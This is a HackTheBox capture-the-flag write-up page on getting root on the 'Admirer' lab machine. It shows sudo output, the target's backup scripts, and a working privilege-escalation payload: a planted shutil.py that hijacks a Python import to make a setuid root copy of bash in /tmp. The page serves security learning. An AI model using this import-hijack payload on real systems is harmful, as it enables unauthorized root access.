🔐
HackTheBox Writeups
  • kashz HTB Writeups
  • HTB BOXES
    • ACCESS
      • 5 admin
      • 4 user
      • 3 telnet
      • 2 http
      • 1 recon
    • ADMIRER
      • 5 root
      • 4 adminer-php
      • 3 ftp
      • 2 http
      • 1 recon
    • ARCHETYPE
      • 3 :1433 mssql
      • 2 :139 :445 smb
      • 1 recon
    • ARMAGEDDON
      • 8 privesc dirty_sockv2
      • 7 privesc
      • 6 box enum bruce
      • 5 :80 drupalgeddon2
      • 4 :80 droopescan
      • 3 :80
      • 2 :80 robots.txt
      • 1 recon
    • ATOM
      • 4 privesc
      • 3 box enum jason
      • 2 :139 :445 smb
      • 1 recon
    • BANK
      • 5 privesc
      • 4 box enum
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • BANKROBBER
      • 6 privesc brute force PIN > BOF
      • 5 privesc bankv2.exe
      • 4 box enum cortin
      • 3 admin backdoorchecker.php
      • 2 :80 :443 XSS > admin
      • 1 recon
    • BASHED
      • 2 :80
      • 1 recon
    • BASTARD
      • 6 privesc_2 ms10-059
      • 5 privesc_1 ms15-051
      • 4 box enum KE
      • 3 :80 drupalgeddon2
      • 2 :80 drupal7
      • 1 recon
    • BASTION
      • 3 box enum > privesc
      • 2 :139 :445 smb
      • 1 recon
    • BEEP
      • 7 :80 elastix 2.2.0 RCE + privesc
      • 6 :10000 webmin
      • 5 :25 smtp
      • 4 :80 vtigercrm
      • 3 :80 admin
      • 2 :80
      • 1 recon
    • BLOCKY
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • BLUE
      • 3 ms17-010
      • 2 :139 :445 smb
      • 1 recon
    • BLUNDER
      • 5 www-data > hugo > root
      • 4 box enum
      • 3 bludit 3.9.2 file_upload RCE
      • 2 :80
      • 1 recon
    • BOUNTY
      • 4 JuicyPotato
      • 3 privesc check
      • 2 :80
      • 1 recon
    • BOUNTYHUNTER
      • 4 privesc
      • 3 :22 ssh development
      • 2 :80 xxe
      • 1 recon
    • BRAINFUCK
      • 5 privesc
      • 5 :443 sup3rs3cr3t.brainfuck.htb
      • 4 :143 imap
      • 3 :443 wpscan
      • 2 :443
      • 1 recon
    • BRAINPAN1
      • 4 privesc
      • 3 BOF
      • 2 :10000
      • 1 recon
    • BUCKET
      • 6 privesc
      • 5 dynamodb roy
      • 4 box enum www-data
      • 3 :80 s3.bucket.htb
      • 2 :80 bucket.htb
      • 1 recon
    • BUFF
      • 4 privesc
      • 3 :80
      • 2 :8080
      • 1 recon
    • CAP
      • 4 privesc
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • CHATTERBOX
      • 5 privesc autologon creds
      • 4 privesc w/ grant perm
      • 3 box enum
      • 2 :9256 achat chat system
      • 1 recon
    • CONCEAL
      • 9 privesc
      • 8 :80
      • 7 :21 ftp
      • 6 post vpn recon
      • 5 ipsec conn config
      • 4 ipsec summary
      • 3 :500/udp ipsec
      • 2 :161/udp snmp
      • 1 recon
    • CRONOS
      • 6 post enum
      • 5 privesc cronjob
      • 4 box enum
      • 3 :53 dns
      • 2 :80
      • 1 recon
    • DELIVERY
      • 4 :3306 mysql > privesc
      • 3 :8065 mattermost
      • 2 :80
      • 1 recon
    • DEVEL
      • 4 privesc_2 ms11-046
      • 3 privesc_1 JuicyPotato
      • 2 :21 ftp
      • 1 recon
    • DOCTOR
      • 7 post enum
      • 6 :8089 privesc splunk > root
      • 5 web > shaun
      • 4 box enum web
      • 3 :80 SSTI
      • 2 :80 splunkd
      • 1 recon
    • DYNSTR
      • 6 privesc
      • 5 box enum > bindmgr
      • 4 nsupdate exploit
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • EXPLORE
      • 3 :2222 ssh kristi > root
      • 2 :59777 es file explorer
      • 1 recon
    • FRIENDZONE
      • 7 privesc
      • 6 administrator1.friendzone.red
      • 5 dns
      • 4 smb
      • 3 :443
      • 2 :80
      • 1 recon
    • FUSE
      • 7 privesc SeLoadDriverPrivilege
      • 6 rpc
      • 5 spray passwd
      • 4 :389 ldap
      • 3 :80 PaperCut Logger
      • 2 :139 :445 smb
      • 1 recon
    • GRANDPA
      • 4 privesc
      • 3 webdav exploit
      • 2 :80
      • 1 recon
    • GRANNY
      • 4 privesc
      • 3 :80 webdav exploit
      • 2 :80
      • 1 recon
    • HAIRCUT
      • 5 post enum
      • 4 privesc www-data > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • IRKED
      • 4 box enum
      • 3 :6697 irc
      • 2 :80
      • 1 recon
    • JARVIS
      • 9 post enum
      • 8 pepper > root
      • 7 www-data > pepper
      • 6 box enum www-data
      • 5 phpMyAdmin 4.8 LFI
      • 4 :80 sqli
      • 3 :64999
      • 2 :80
      • 1 recon
    • JEEVES
      • 2 :50000
      • 1 recon
    • JERRY
      • 4 manual
      • 3 tomcatWarDeployer
      • 2 :8080 tomcat
      • 1 recon
    • KNIFE
      • 3 privesc
      • 2 :80 php 8.1.0 dev
      • 1 recon
    • LABORATORY
      • 6 privesc
      • 5 gitlab admin dexter
      • 4 stable shell
      • 3 :443 gitlab shell
      • 2 :443 gitlab
      • 1 recon
    • LACASADEPAPEL
      • 4 box enum > privesc
      • 3 :80 > :443
      • 2 :21 ftp
      • 1 recon
    • LAME
      • 4 :139 :445 smb exploit
      • 3 :3632 distccd
      • 2 :139 :445 smb
      • 1 recon
    • LEGACY
      • 4 MS-17-010
      • 3 MS08-067
      • 2 :139 :445 smb
      • 1 recon
    • LOVE
      • 3 privesc
      • 2 :80
      • 1 recon
    • MAGIC
      • 5 post enum
      • 4 privesc theseus > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • MANGO
      • 6 post enum
      • 5 privesc admin > root
      • 4 mango > admin
      • 3 box enum mango
      • 2 :80 :443
      • 1 recon
    • MIRAI
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • MONITORS
      • 12 post enum
      • 11 docker breakout > root
      • 10 Apache Tomcat/9.0.31 deserialization RCE > docker root
      • 9 box enum marcus
      • 8 manual enum www-data
      • 7 :8443
      • 6 box enum www-data
      • 5 cacti-admin.monitors.htb
      • 4 wp with spritz exploit
      • 3 :80 wpscan
      • 2 :80
      • 1 recon
    • NETWORKED
      • 7 post enum
      • 6 box enum guly > privesc > root
      • 5 check_attack.php
      • 4 box enum
      • 3 :80 upload.php & lib.php
      • 2 :80
      • 1 recon
    • NIBBLES
      • 4 privesc
      • 3 fileUpload exploit
      • 2 :80
      • 1 recon
    • NINEVEH
      • 6 post enum
      • 5 privesc amrois > root
      • 4 box enum www-data > amrois
      • 3 :443
      • 2 :80
      • 1 recon
    • NODE
      • 7 post enum
      • 6 privesc tom > root
      • 5 mark > tom
      • 4 box enum mark
      • 3 :3000 login
      • 2 :3000
      • 1 recon
    • OMNI
      • 5 cracking user.txt | root.txt
      • 4 dump SAM SYSTEM
      • 3 box enum ?
      • 2 :8080
      • 1 recon
    • OOPSIE
      • 4 post enum
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • OPENADMIN
      • 6 joanna > root
      • 5 jimmy > joanna
      • 4 manual enum > jimmy
      • 3 openNetAdmin 18.1.1
      • 2 :80
      • 1 recon
    • OPHIUCHI
      • 4 privesc
      • 3 yaml deserialization exploit
      • 2 :8080
      • 1 recon
    • OPTIMUM
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • PASSAGE
      • 7 post enum
      • 6 privesc dbus com.ubuntu.USBCreator.conf
      • 5 box enum nadav
      • 4 box enum paul
      • 3 box enum www-data
      • 2 :80 cutenews
      • 1 recon
    • POISON
      • 6 foothold_3 log poisoning
      • 5 foothold_2 phpinfo.php + LFI
      • 4 privesc vncviewer > root
      • 3 box enum charix
      • 2 :80
      • 1 recon
    • POPCORN
      • 7 post enum
      • 6 privesc_2 rds
      • 5 privesc_1 full-nelson
      • 4 manual privesc > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • POSTMAN
      • 6 webmin (matt > root)
      • 5 Matt > root
      • 4 redis > Matt
      • 3 :6379 redis
      • 2 :80
      • 1 recon
    • QUERIER
      • 6 privesc GPP CachedPassword
      • 5 privesc
      • 4 mssql using msf
      • 3 mssql
      • 2 smb
      • 1 recon
    • READY
      • 4 PEAS > docker > escape > root
      • 3 :5080 gitlab
      • 2 :5080 robots.txt
      • 1 recon
    • REMOTE
      • 8 privesc teamviewer
      • 7 privesc UsoSvc
      • 6 privesc
      • 5 RCE
      • 4 :111 rpc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • SCRIPTKIDDIE
      • 2 :5000
      • 1 recon
    • SECNOTES
      • 9 privesc_3 bash.exe
      • 8 privesc_2 UsoSvc
      • 7 privesc_1 PrintSpoofer
      • 6 box enum iis apppool
      • 5 :445 smb
      • 4 :80 CSRF
      • 3 :8808 IIS
      • 2 :80 IIS
      • 1 recon
    • SENSE
      • 2 :80 pfsense
      • 1 recon
    • SERVMON
      • 5 privesc
      • 4 box enum nadine
      • 3 :80 NVMS
      • 2 :21 ftp
      • 1 recon
    • SHIELD
      • 3 privesc
      • 2 :80
      • 1 recon
    • SHOCKER
      • 2 :80 shellshock
      • 1 recon
    • SILO
      • 6 odat shell
      • 5 sqlplus
      • 4 :1521 orcale tns listener
      • 3 :8080 XDB
      • 2 :80
      • 1 recon
    • SNEAKYMAILER
      • 11 post enum
      • 10 privesc low > root
      • 9 localhost:5000 > low
      • 8 box enum developer
      • 7 box enum www-data
      • 6 :21 ftp
      • 5 :143 imap
      • 4 :25 smtp
      • 3 :8080
      • 2 :80
      • 1 recon
    • SNIPER
      • 8 box enum chris + privesc
      • 7 iusr > chris
      • 6 privesc_1 PrintSpoofer
      • 5 box enum nt authority\iusr
      • 4 :80 /blog > LFI > smbRFI
      • 3 :80 /user
      • 2 :80
      • 1 recon
    • SOLIDSTATE
      • 7 privesc
      • 6 :22 ssh mindy
      • 5 :110 pop3
      • 4 apache james 2.3.2 RCE
      • 3 :4555 JAMES RAT 2.3.2
      • 2 :80
      • 1 recon
    • SPECTRA
      • 4 nginx shell > katie
      • 3 wordpress
      • 2 :80
      • 1 recon
    • SPIDER
      • 8 post enum
      • 7 localhost:8080 XXE
      • 6 box enum chiv manual
      • 5 box enum chiv
      • 4 :80 chiv login + SSTI
      • 3 :80 sqlmap via flask cookie
      • 2 :80 SSTI via /register to /user
      • 1 recon
    • SWAGSHOP
      • 3 privesc
      • 2 :80
      • 1 recon
    • TABBY
      • 5 tomcat > ash > root
      • 4 box enum
      • 3 :8080 tomcat9
      • 2 :80
      • 1 recon
    • TARTARSAUCE
      • 10 post enum
      • 9 privesc omuna > root
      • 8 box enum onuma
      • 7 www-data > onuma
      • 6 box enum www-data
      • 5 :80 monstra
      • 4 :80 wpscan
      • 3 :80 monstra
      • 2 :80
      • 1 recon
    • TENET
      • 4 privesc
      • 3 php file injection (deserialization exploit)
      • 2 :80 wordpress
      • 1 recon
    • THENOTEBOOK
      • 5 privesc docker runC exploit
      • 4 shell
      • 3 :80 JWT exploitation
      • 2 :80
      • 1 recon
    • TRAVEREXEC
      • 5 david > root
      • 4 www-data > david
      • 3 box enum
      • 2 :80 nostromo 1.9.6
      • 1 recon
    • VACCINE
      • 4 privesc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • VALENTINE
      • 6 privesc dirtyc0w
      • 5 privesc tmux
      • 4 box enum
      • 3 heartbleed
      • 2 :80
      • 1 recon
    • WORKER
      • 11 evil-winrim robisl :5985
      • 10 box manual enum
      • 9 box enum iis apppool\defaultapppool
      • 8 privesc PrintSoofer FAIL
      • 7 :80 spectral.worker.htb shell
      • 6 :80 devops.worker.htb
      • 5 explore domains
      • 4 :80 dimension.worker.htb
      • 3 :3690 subversion
      • 2 :80 IIS 10.0
      • 1 recon
Powered by GitBook
On this page
  • backup.py
  • admin_tasks.sh
  • Privilege Escalation to root
  • Exploitation by adding SUID bit to /usr/bin/find
  1. HTB BOXES
  2. ADMIRER

5 root

PreviousADMIRERNext4 adminer-php

Last updated 3 years ago

waldo@admirer:~$ sudo -l
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh

backup.py

#!/usr/bin/python3
from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
# dst = '/srv/ftp/html'
dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

admin_tasks.sh

#!/bin/bash

view_uptime() {
    /usr/bin/uptime -p
}

view_users() {
    /usr/bin/w
}

view_crontab() {
    /usr/bin/crontab -l
}

backup_passwd() {
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_shadow() {
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_web() {
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_db() {
    if [ "$EUID" -eq 0 ]
    then
        echo "Running mysqldump in the background, it may take a while..."
        #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
        /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;

        *) echo "Unknown option." >&2
    esac
    exit 0
fi

# Interactive way, to be called from the command line
options=("View system uptime"
         "View logged in users"
         "View crontab"
         "Backup passwd file"
         "Backup shadow file"
         "Backup web data"
         "Backup DB"
         "Quit")
echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo "Bye!" ; break ;;

        *) echo "Unknown option." >&2
    esac
done
exit 0

Privilege Escalation to root

So we can set envvars (SENTENV) and backup.py is importing make_archive from shutil.

  1. create a shutil.py

  2. define new definition for make_archive function

  3. execute it.

Exploitation by adding SUID bit to /usr/bin/find

import os

def make_archive(a, b, c):
    pass

os.system('cp /bin/bash /tmp/kashz_bash; chown root:root /tmp/kashz_bash; chmod 4755 /tmp/kashz_bash')
robots.txt
root